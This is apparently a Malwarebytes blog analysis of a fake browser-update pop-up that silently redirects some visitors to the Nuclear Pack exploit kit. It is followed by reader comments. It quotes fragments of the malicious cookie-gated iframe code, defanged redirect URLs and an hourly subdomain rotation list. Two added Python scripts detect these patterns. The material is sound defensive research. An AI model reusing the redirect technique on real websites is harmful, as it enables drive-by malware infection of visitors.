A cunning way to deliver malware

Potentially unwanted programs, also known as PUPs, continue to be a real nuisance. A recent blog post by Will Dormann on CERT.org shows the prevalence of such applications lurking on every corner of the web: search engines results, software portals, popups, ads, etc.

Deceptive tactics

Here is an example of an unwanted warning pushed as a pop-up:

[Screenshot: the pop-up warning message]

The text reads: “UPDATED RECOMMENDED! It is recommended that you install the software to ensure your browser is the latest version. Please update to continue.”

The following page shows that our browser (Internet Explorer) may be out of date and urges us to download a program to check for outdated software.

[Screenshot: the software update download page]

It is worth noting that this webpage was totally unsolicited and is in fact very misleading. The disclaimer hiding at the bottom of the page reveals more about what this is all about:

UpdateNowPro.com is distributing Software Updater. Air Installer is an install manager that will manage the installation of the selected software. In addition to managing the installation of your selected software, this install manager will make recommendations for additional free software that you may be interested in. Additional software may include toolbars, browser add-ons, game applications, anti-virus applications and other types of applications. You are not required to install any additional software to receive your selected software. You can completely remove the program at any time in Windows ‘Add/Remove Programs’. At the time of downloading you accept the Terms and Privacy Policy.

In other words, the program they want you to download bundles other applications, something we know all too well.

Attempting to close the page brings up yet another warning:

[Screenshot: the confirmation dialog shown when closing the page]

We could argue with advertisers that these practices are not okay until we are blue in the face. But here’s the catch with this one: while the page is saying our system could be at risk we are silently being infected with a drive-by download!

From PUP to exploit kit

The following Fiddler (web debugger) capture was recorded on: 2014-06-30 18:30 PT. It shows how bad guys leverage large infrastructures to hide malicious redirections behind potentially unwanted programs.

[Screenshot: Fiddler capture, 2014-06-30 18:30:51]

hxxp://rvzr-a.akamaihd.net/sd/apps/fusionx/0.0.4.html?aff=1700-1043
hxxp://www.likemagicbox.com/fusionx/www/delivery/afr.php?zoneid=486&cb=6065978317
hxxp://classic.flowershopprescott.com/assets/js/jquery-1.3.1.min.js?ver=1.27.8660
hxxp://draft.traveltube.biz/d36c829bovoym7.html

Some users are redirected to an exploit kit while being served the same software update page. This is a very sneaky attack involving many actors, with rotating domain names that make identification harder:

[Diagram: the full redirection chain]

The domain likemagicbox.com illustrated in this case was registered on 2014-06-30, the same day it started being used in this malware campaign: this is no simple coincidence!

Traffic analysis

The first URL on akamaihd.net has an external JavaScript inclusion:

[Screenshot 1: the external JavaScript inclusion]

The JavaScript contains a convoluted variable holding various identifiers that correspond to the type of ad and the geolocation of the visitor. More importantly, we see the iframe redirecting to an abused/complicit server:

[Screenshot 2: the iframe redirection inside the JavaScript]

Once on this URL there are a couple of different ad redirections (note the Yahoo advert too!). And there is this interesting code snippet:

if(document.cookie.indexOf("_epel")==-1){var page_object=document.createElement("iframe");

This checks the user’s computer for a cookie called _epel and only if it does not exist will it allow the creation of a secondary (malicious) iframe. To prevent the same user from getting redirected to it again, another little piece of code creates the aforementioned cookie before exiting:

document.cookie = "_epel=readed;

[Screenshot 3: the cookie check and the cookie being set]
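The cookie gate just described is a useful thing to hunt for in script bodies pulled from a proxy log or a sandbox run. The scanner below is an added example and not code from the post: it flags a `document.cookie.indexOf("...")==-1` check that is followed by an iframe creation, and reports whether the same script also sets that marker cookie (the "redirect each visitor only once" behaviour). SAMPLE_SCRIPT and BENIGN_SCRIPT are constructed for the example; only the two fragments quoted above are real.

```python
"""Detect cookie-gated iframe injection in a JavaScript body.

Added example, not code from the Malwarebytes post. The malicious page
quoted above only creates its secondary iframe when the "_epel" marker
cookie is absent, then sets that cookie so the same visitor is not
redirected twice. This scanner looks for that pattern in script text.
"""
import re

# document.cookie.indexOf("NAME")==-1  -> "run only if the marker cookie is absent"
GATE_RE = re.compile(
    r'document\.cookie\.indexOf\(\s*["\']([^"\']+)["\']\s*\)\s*==\s*-1')
# createElement("iframe") -> the gated branch builds an iframe
IFRAME_RE = re.compile(r'createElement\(\s*["\']iframe["\']\s*\)')
# document.cookie = "NAME=..." -> the marker cookie being set afterwards
SET_RE = re.compile(r'document\.cookie\s*=\s*["\']([^="\']+)=')


def find_cookie_gated_iframes(script, window=400):
    """Return one finding per cookie check that guards an iframe creation.

    `window` bounds how far past the check (in characters) the iframe
    creation may appear; minified loaders keep the two close together.
    """
    marker_cookies = {m.group(1).strip() for m in SET_RE.finditer(script)}
    findings = []
    for gate in GATE_RE.finditer(script):
        name = gate.group(1)
        tail = script[gate.end():gate.end() + window]
        if not IFRAME_RE.search(tail):
            continue  # cookie check without an iframe: consent banners etc.
        findings.append({
            "cookie": name,
            "offset": gate.start(),
            # True when the script also sets the same cookie, i.e. the
            # "redirect each visitor once" behaviour described in the post
            "sets_marker": name in marker_cookies,
        })
    return findings


# Constructed sample: the post's two fragments embedded in a plausible loader.
SAMPLE_SCRIPT = (
    'var ad=1;'
    'if(document.cookie.indexOf("_epel")==-1){'
    'var page_object=document.createElement("iframe");'
    'page_object.src="http://placeholder.invalid/loader.html";'
    'page_object.width=1;page_object.height=1;'
    'document.body.appendChild(page_object);}'
    'document.cookie = "_epel=readed; path=/";'
)

# Constructed benign script: a cookie check that shows a banner, no iframe.
BENIGN_SCRIPT = (
    'if(document.cookie.indexOf("consent")==-1){showConsentBanner();}'
    'document.cookie = "consent=1; path=/";'
)

if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, find_cookie_gated_iframes(body))
```

The benign script shows why the iframe check matters: cookie-gated branches are common in legitimate consent and first-visit code, so the cookie test alone would be noisy. Tightening `window` trades a few missed hits for fewer false positives on large bundles.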

This dynamically created iframe is rotated every hour using a simple sub-domain generation algorithm (DGA) with alphabetically sorted keywords:

URL,Date,Registrant
co.TOASTEDROOSTERCAFE.COM,Thu Jul 3 13:04,Robert Maynard
coa.TOASTEDROOSTERCAFE.NET,Thu Jul 3 14:03,Robert Maynard
coas.TOASTGUYS.COM,Thu Jul 3 15:04,Robert Maynard
coach.TOASTHOUSE.COM,Thu Jul 3 16:06,?
coaches.TOASTHOUSEMARKET.COM,Thu Jul 3 17:02,Robert Maynard
coaching.TOASTKITCHEN.COM,Thu Jul 3 18:17,Robert Maynard
coal.TOASTMARKET.COM,Thu Jul 3 19:22,Robert Maynard
coals.TSTKITCHEN.COM,Thu Jul 3 20:12,?
coast.2NDAMENDMENTVOTERS.COM,Thu Jul 3 21:07,?
coastal.2NDAMENDMENTVOTERS.ORG,Thu Jul 3 22:02,?
coat.AIMINSINC.INFO,Thu Jul 3 23:07,Kurt Grashaw
coating.AMERICANBROTHERSINARM.COM,Fri Jul 4 00:07,Kurt Grashaw
coatings.ANALEHSHOW.COM,Fri Jul 4 01:12,Kurt Grashaw
cobra.CCNAXUSCONSTRUCTION.COM,Fri Jul 4 02:02,Kurt Grashaw
coc.GRANBYSOCCER.COM,Fri Jul 4 03:12,Kurt Grashaw
cock.LOOKINGTOVOLUNTEER.ORG,Fri Jul 4 04:02,Kurt Grashaw

Many of these root domains belong to the same people, as if the bad guys were enumerating compromised registrar accounts.

Malicious iframes are inserted within jquery (a very popular JavaScript library) files such as:

{subdomain.domain}/assets/js/jquery-1.3.1.min.js?ver=1.27.8660

After the URL has been used for an hour, it is discarded and the subdomain no longer responds.
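The rotation pattern above (one subdomain per hour, labels walking through a sorted word list, each root domain used once, roots clustered by registrant) can be checked mechanically against a hostname timeline. The script below is an added example, not the post's own analysis: it embeds the post's URL,Date,Registrant rows as its input, assumes the year 2014 from the capture date given earlier, and reports the properties that make this rotation recognisable. Feeding it hostnames from your own proxy or DNS logs is the intended use.

```python
"""Check an observed hostname timeline for an hourly, word-list-driven
subdomain rotation.

Added example, not the post's own tooling. Input rows are the ones listed
in the post; the year 2014 is assumed from the capture date it gives.
"""
from collections import Counter
from datetime import datetime, timedelta
from os.path import commonprefix

# Rows copied from the post's table (host,Date,Registrant).
OBSERVED = """\
co.TOASTEDROOSTERCAFE.COM,Thu Jul 3 13:04,Robert Maynard
coa.TOASTEDROOSTERCAFE.NET,Thu Jul 3 14:03,Robert Maynard
coas.TOASTGUYS.COM,Thu Jul 3 15:04,Robert Maynard
coach.TOASTHOUSE.COM,Thu Jul 3 16:06,?
coaches.TOASTHOUSEMARKET.COM,Thu Jul 3 17:02,Robert Maynard
coaching.TOASTKITCHEN.COM,Thu Jul 3 18:17,Robert Maynard
coal.TOASTMARKET.COM,Thu Jul 3 19:22,Robert Maynard
coals.TSTKITCHEN.COM,Thu Jul 3 20:12,?
coast.2NDAMENDMENTVOTERS.COM,Thu Jul 3 21:07,?
coastal.2NDAMENDMENTVOTERS.ORG,Thu Jul 3 22:02,?
coat.AIMINSINC.INFO,Thu Jul 3 23:07,Kurt Grashaw
coating.AMERICANBROTHERSINARM.COM,Fri Jul 4 00:07,Kurt Grashaw
coatings.ANALEHSHOW.COM,Fri Jul 4 01:12,Kurt Grashaw
cobra.CCNAXUSCONSTRUCTION.COM,Fri Jul 4 02:02,Kurt Grashaw
coc.GRANBYSOCCER.COM,Fri Jul 4 03:12,Kurt Grashaw
cock.LOOKINGTOVOLUNTEER.ORG,Fri Jul 4 04:02,Kurt Grashaw
"""


def parse_rows(text, year=2014):
    """Parse 'host,Date,Registrant' lines into (label, root, timestamp, registrant),
    sorted by time. The year is assumed because the rows carry none."""
    rows = []
    for line in text.strip().splitlines():
        host, when, registrant = line.split(",")
        label, root = host.lower().split(".", 1)  # first label vs. root domain
        ts = datetime.strptime(f"{year} {when}", "%Y %a %b %d %H:%M")
        rows.append((label, root, ts, registrant))
    return sorted(rows, key=lambda r: r[2])


def analyse_rotation(rows, min_gap=timedelta(minutes=40),
                     max_gap=timedelta(minutes=80)):
    """Summarise the properties that make the rotation recognisable."""
    labels = [r[0] for r in rows]
    roots = [r[1] for r in rows]
    times = [r[2] for r in rows]
    gaps = [b - a for a, b in zip(times, times[1:])]
    # how many consecutive label pairs are in alphabetical order
    ordered = sum(1 for a, b in zip(labels, labels[1:]) if a < b)
    return {
        "hosts": len(rows),
        "common_prefix": commonprefix(labels),   # the word list is walked from one prefix
        "ordered_pairs": (ordered, len(gaps)),   # (in-order pairs, total pairs)
        "unique_roots": len(set(roots)) == len(roots),
        "hourly": all(min_gap <= g <= max_gap for g in gaps),
        "registrants": dict(Counter(r[3] for r in rows)),
    }


if __name__ == "__main__":
    for key, value in analyse_rotation(parse_rows(OBSERVED)).items():
        print(f"{key}: {value}")
```

On the post's rows the report shows 16 hosts, every root domain used once, every gap between 50 and 75 minutes, and two registrants accounting for six hosts each. One pair (coas before coach) is out of strict alphabetical order as transcribed, so `ordered_pairs` comes out as 14 of 15 rather than 15 of 15; a near-sorted walk from a common prefix is still a strong signal when seen in your own logs.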

[Screenshot 4b: the expired subdomain no longer responding]

You may have recognized the URL for the landing page of the Nuclear Pack exploit kit:

[Screenshot 5: the Nuclear Pack landing page URL]

The page loads a Java exploit (CVE-2013-2465?):

[Screenshot: the Java exploit request]

and a Flash exploit (CVE-2014-0515?):

[Screenshot: the Flash (SWF) exploit request]

Two malware payloads are subsequently dropped (#1, #2), detected as Spyware.Zbot.VXGen by Malwarebytes Anti-Malware.

Parting thoughts

Earlier recorded events with a similar redirection method date back to May 2014 as documented in this security blog.

Malwarebytes is tough on PUPs and we show no mercy for exploits or malware.

We have reported this incident to Akamai’s Abuse department so that they can take immediate action against these bad actors.

@jeromesegura


  • https://www.facebook.com/sawtoothpaper Brandon Anderson

    I just wanted to thank you guys regarding PUPs. When it comes to Malware if you include Adware and Spyware nobody was paying extra attention to PUPs. I have Avast, I had to turn up the PUP sensitivity which is set to medium on default and does a mediocre job.

    I also have Malwarebytes Premium which I got in 2008. Malwarebytes is my go to tool for PUPs. I love the strict guidelines and you’re the only one on the market I know that is.

    When I give PC advice, I tell people to try Malwarebytes for cleaning up. The PUP problem is a bigger and more common problem. When PUPs pile up it becomes a performance problem. So I recommend Avast and Malwarebytes as they work together great.

    While in school I did a power point presentation on PUPs. I was actually quite frustrated how bad it was and nobody treated it like Malware. In my lab I created a couple virtual machines and infested them with everything I could. I used Virus Total to go find my Malware along with my “Potentially Unwanted Programs”. I used trial versions of different anti-viruses and analyzed detection and cleanup. Malwarebytes nailed 100% of PUPs and did a better cleanup job.

    I always check my dialogue screens when installing software. You’d be surprised how many install crap without giving you option/telling you. Thanks guys :)

  • Jérôme Segura

    Hi Brandon Anderson,

    Thanks for the comment. We appreciate your loyalty and are glad you share the same vision regarding PUPs.

    Have a great day!

  • Peter Parker

    I’m thinking that for a Power Point Presentation that’s coming up, about doing it on Computer Viruses and Malware. Any viruses or malware that might be interesting to do or suggest? Leave a reply for me.

  • Pingback: A cunning way to deliver malware | Malwarebytes Unpacked | VComputerWorks

  • https://www.facebook.com/sawtoothpaper Brandon Anderson

    Cryptolocker and all its variants. FBI Ransomware all its similar variants.

    Zeus Trojan and all its variants.

  • Jérôme Segura

    These are good suggestions Brandon :)

  • Pingback: Una manera astuta para entregar el malware (ENG)

  • Pingback: A Week in Security (Jul 6 – 12) | Malwarebytes Unpacked

  • Pingback: OTR Links 07/19/2014 | doug — off the record

  • cstack

    PUPs destroyed my XP computer .

  • http://whimsicalartistry.com Trey Wallis

    I get a lot of PUPS and Malwarebytes Free identifies them and cleans them from my computer. Thanks.

  • Andyman77

    Doing a presentation on cryptolocker would be good. Although it may be difficult to show the infection in real time (which would be good to show) unless you are actually infected by this and it’s not something (I believe) that you can get from domain lists because of how the virus works with the c&c center. Please feel free to correct me as that’s how you learn :-) good luck with whatever you go decide to do though :-)

  • Scott Satellite

    I have a few friends who are not too computer savvy and get really thrown by this type of pop-up. Thanks for a page full of examples I can show them to help them understand what to avoid.

  • Jody Ogden

    I love Malwarebytes – this is an example of why. I tend to have all of my clients run MWB along with a traditional Anti-Virus. I started doing this about 2 years ago, and the number of “EMERGENCY” calls has dropped by over 95%! Thanks again Malwarebytes – keep up the good work. My only suggestion is creating a console for the Sysadmins who implement this across multiple enterprises – even for those who only manage 1 enterprise would benefit GREATLY!

  • Pingback: Here’s a techi view of unwanted pop up programs | Bill's Blog

  • OldTulsan

    I love Malwarebytes, but I have one problem..

    I can run Malwarebytes Free with no errors. If I run it after starting and stopping FireFox, MalwareBytes finds 22 FreeCauseTB.A errors:

    I suspect the PUP is in the Javascript file.

    Kaspersky Rescue Disk 10 doesn’t find the PUP in the Javascript file either.

    I’ve deleted Firefox as a workaround, but didn’t delete personalized files.

  • OldTulsan

    Sometimes Kaspersky Rescue Disk 10 can clean up badly infected systems.

    The perps usually don’t want to trash a system, just take control of it.

  • Greg Ferris

    Will Malwarebytes find and destroy the V9 PUP? It has taken my daughter's web browser (Firefox) and no matter what I try I can't kill this problem. Any ideas???

  • HawkZon

    Please recommend the safest browser.

  • Ronnie Alonso

    Why is it hard to remove PUPs? The same PUP’s are identified and removed daily. How about stopping them in the first place?

  • ComputerPCHardware

    Thank you for this post. It’s tough staying ahead of these guys. A lot of users don’t take this stuff seriously enough!

    Will Malwarebytes and Avast work on a PC running Norton 360?
    Norton is my main program but I want to get Malwarebytes and Avast as well.

    Thanks

  • Cindi Rose

    Thank you! You guys are awesome!!!

  • Connie Lester

    I don’t know the safest but I do know that every time I open Google Chrome, Malwarebytes finds a PUP that I have to quarantine. It’s the only time I have a problem. I use 7 different browsers.

  • Rexx Vernon Shelton

    I have two PUP that I cannot get rid of:

    PUP.Optional.Superfish.A

    The other look just like the first:

    PUP.Optional.Superfish.A

    I can, with a search, find Superfish, and then delete all that shows on the search results, and then run Malware again, and it is still on the computer. No matter what I do, I seem to be unable to get them out of my computer. I am sure that this is what is causing the uncalled for links to pop up. To my knowledge I have not given any unsolicited site to change my computer.

    Is there any help for this.

  • HawkZon

    I deleted Chrome because it’s like PUP Central.

  • Andyman77

    Maybe you could try doing a boot scan. Also a full scan with Malwarebytes and AdwCleaner. Failing that you may want to get someone to run ComboFix. Just make sure whoever runs ComboFix knows how to use it. :-)

  • Eldon

    I had a similar problem with the fake antivirus program. Neither Malwarebytes nor avast! could get rid of it. It creates a startup entry that doesn’t show in msconfig. But, CCleaner did show it, as well as where the offending files were. Start your PC in safe mode, delete the startup entry and the files with CCleaner. It’s worth a try.
    PS If you’re not familiar with CCleaner, it is safe and one of the most popular programs of its kind. Download it from the publisher Piriform.

  • HawkZon

    I recently put Norton 360 on this computer and it has prevented me from playing a little game called Snood. When I called Norton they told me I couldn’t run Malwarebytes with Norton or it would cause the computer to be open to malicious programs.
    Is there any validity in this statement?

    Because I wouldn’t uninstall Malwarebytes, they wouldn’t tell me how to configure
    360 to play my game, which can’t see the game server anymore.
